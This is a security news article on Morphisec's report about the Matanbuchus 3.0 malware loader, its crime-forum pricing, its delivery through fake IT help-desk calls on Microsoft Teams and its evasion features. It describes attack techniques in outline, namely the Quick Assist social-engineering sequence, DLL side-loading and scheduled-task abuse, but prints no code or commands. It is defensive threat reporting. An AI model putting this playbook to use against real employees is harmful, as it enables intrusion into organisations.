Morphisec said on Wednesday that a new version of the Matanbuchus malware loader is being distributed by phishing through Microsoft Teams, confirming that the well‑known Malware‑as‑a‑Service product has quietly evolved into a far more elusive threat. Researchers analysing the samples call the build “Matanbuchus 3.0,” describing it as a near‑total rewrite that relies on deeper in‑memory execution, heavier obfuscation and a revamped command‑and‑control protocol to keep detections low.
An advertisement posted to a Russian‑language crime forum on 7 July 2025 pitches the update at US $10,000 per month for the HTTPS flavour and US $15,000 for a DNS‑tunnel variant, up from the original 2021 rental fee of $2,500. Morphisec notes that it intercepted the loader in the wild days before the ad appeared, proof that the new build had already been circulating in trusted criminal circles.
Matanbuchus has served as a conduit for ransomware operators and red‑team toolkits since 2021, ferrying Cobalt Strike beacons, QakBot, DanaBot and other second‑stage implants that often precede file‑encryption attacks. Its delivery methods have morphed from malicious MSI installers and drive‑by downloads on compromised websites to Google Drive links, malvertising and, most recently, socially engineered Microsoft Teams calls aimed at selected employees of high‑value companies.
In one incident this month a Morphisec customer received an external Teams call from attackers posing as an IT help‑desk crew. The callers persuaded staff to open Microsoft’s Quick Assist tool for remote troubleshooting, then walked them through a single‑line PowerShell command that fetched a ZIP archive. The bundle held a renamed Notepad++ updater (GUP.exe), a tampered XML configuration file and a malicious side‑loaded DLL that instantiated the Matanbuchus loader—an approach that neatly bypassed email filtering and endpoint detection.
Version 3.0’s feature list reads like a catalogue of modern evasion: indirect system‑call tricks, Windows Management Instrumentation queries, support for WQL, CMD and PowerShell reverse shells, and the ability to drop or inject EXE, DLL, MSI or raw shellcode payloads. The loader watches running processes for security tools, checks its privilege level, and talks to its C2 over an encrypted channel before scheduling follow‑on tasks via COM object abuse—a tactic Morphisec’s Michael Gorelik says “manipulates the ITaskService in a way that most EDR engines simply don’t log.”
Once installed, Matanbuchus exfiltrates hardware and software inventories, pulls down additional payloads and establishes persistence, often by side‑loading legitimate Windows binaries such as regsvr32, rundll32 or msiexec or by carving out hollowed host processes. Those capabilities, combined with pricing that rivals top loader families like Bumblebee, position Matanbuchus 3.0 as a premium launchpad for ransomware crews including Black Basta, which already favour Teams‑based social engineering.
Security analysts say the rise of loaders that masquerade as business‑collaboration traffic—Zoom phishing and Slack token theft have also increased—underscores the need for strict verification policies around external chat requests and stronger monitoring of remote‑assist tools. As Gorelik puts it, “Matanbuchus 3.0 shows how little code attackers now need to touch disk before your EDR rings an alarm—by the time you hear it, the beacon is already calling home.”
We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.
